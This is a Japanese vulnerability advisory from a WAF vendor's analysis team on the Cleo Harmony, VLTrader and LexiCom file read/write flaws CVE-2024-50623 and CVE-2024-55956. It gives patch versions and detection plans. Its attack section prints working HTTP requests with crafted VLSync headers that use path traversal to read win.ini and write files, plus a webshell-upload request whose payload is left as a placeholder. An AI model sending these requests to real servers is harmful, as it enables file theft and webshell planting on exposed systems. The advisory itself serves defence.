TAチームが 「Cleo Harmony, VLTrader and LexiCom File Read/Write Vulnerability 」を解析して書いた脆弱性レポート。
同脆弱性は、クレオが提供するソフトウェアにファイルリード/ライトの脆弱性があり、操作されたVLSyncヘッダを通じて、同ソフトウェアを利用するサービス内の悪意のあるファイルへのアクセスやアップロードを試みるもの。
この脆弱性は、Harmony、VLTrader、LexiCom 5.8.0.21および5.8.0.24でパッチが適用されており、AIWAFでは関連する脆弱性を継続的に監視している。
1. 概要
Cleoは、Managed File Transfer Solutionsと呼ばれるソフトウェアを提供するソフトウェア企業で、Harmony、VLTrader、LexiComなどの機能を備えています。本レポートでは、クレオが同社のソフトウェアに存在するファイル読み取りおよび書き込みの脆弱性「CVE-2024-50623」および「CVE-2024-55956」についての分析をまとめています。
出典 : https://www.helpnetsecurity.com/2024/12/10/cve-2024-50623-cleo-file-transfer-software-vulnerabilities-exploited/
2. 攻撃タイプ
CVE-2024-50623は、Cleo Harmony、VLTrader、およびLexiComソフトウェアにおけるファイルの読み取りおよび書き込みの脆弱性であり、ファイルの同期を処理する/Synchronizationエンドポイントにおける脆弱な数値検証を利用して、細工したVLSyncヘッダを送信することで任意のファイルデータを取得するか、悪意のあるWebシェルを送信することで任意のファイルを書き込みます。
GETリクエストを使ってwin.iniファイルを読み込む:
GET /Synchronization HTTP/1.1
Host: www.test.com
VLSync: Retrieve;l=Ab1234-RQ0258;n=VLTrader;v=5.7.0.0;a=1337;po=1337;s=True;b=False;pp=myEncryptedPassphrase;path=..\..\..\windows\win.ini
Content-Type: multipart/form-data; boundary=---------------------------12345678901234567890123456
Content-Length: 0
POSTリクエストを使ってtest.txtファイルを生成する :
POST /Synchronization HTTP/1.1
Host: www.test.com
VLSync: ADD;l=Ab1234-RQ0258;n=VLTrader;v=5.7.0.0;a=1337;po=1337;s=True;b=False;pp=myEncryptedPassphrase;path=..\..\..\test.txt
Content-Type: multipart/form-data; boundary=-----1337
Content-Length: 14
cve-2024-50623
CVE-2024-55956 は、CVE-2024-50623 のパッチ適用バージョンで見つかったファイル書き込みの脆弱性で、VLSync.Multipart;l=0,Acknowledge ヘッダを持つリクエストを送信することで、悪意のある Webshell コンテンツが任意のファイルに書き込まれる可能性があります: Multipart;l=0,Acknowledge ヘッダを持つリクエストを送信することで、悪意のある Webshell コンテンツが任意のファイルに書き込まれる可能性があります。
しかし、この脆弱性はファイルへの書き込みのみを許すという点で、 CVE-2024-50623 とは異なります。
POSTリクエストを使ってtemp/hax.txtファイルを作成する :
POST /Synchronization HTTP/1.1
Host: 192.168.86.50:5080
Connection: close
Content-Type: application/form-data;boundary=--------boundary
VLSync: Multipart;l=0,Acknowledge
Content-Length: 119
VLSync: ReceivedReceipt;service="AS2";msgId=12345;path="temp/hax.txt";receiptfolder=Unspecified;
--------boundary
<Malware code>
3. 対応
CVE-2024-50623はHarmony、VLTrader、LexiCom 5.8.0.21パッチで、CVE-2024-55956はHarmony、VLTrader、LexiCom 5.8.0.24パッチで対応しています。
これらの脆弱性は、細工されたVLSyncヘッダを持つリクエストの送信に関連しているようであり、当社のAIWAF製品のパターンとしてさらに分析され、対応される予定です。
4. 結論
Cleo Harmony、VLTrader、LexiComは、マネージドファイル転送(MFT)ソリューションを支えるソフトウェアであり、多くの大企業で使用されています。CISAは、脆弱性がランサムウェア攻撃に積極的に活用されていると警告しており、これらのソフトウェアを使用している顧客や企業は、できるだけ早く最新バージョンにアップデートする必要があります。
当社のAIWAF製品は、引き続きクレオが提供するソフトウェアの脆弱性を監視し、関連する脆弱性が発見された場合には迅速に対応していきます。
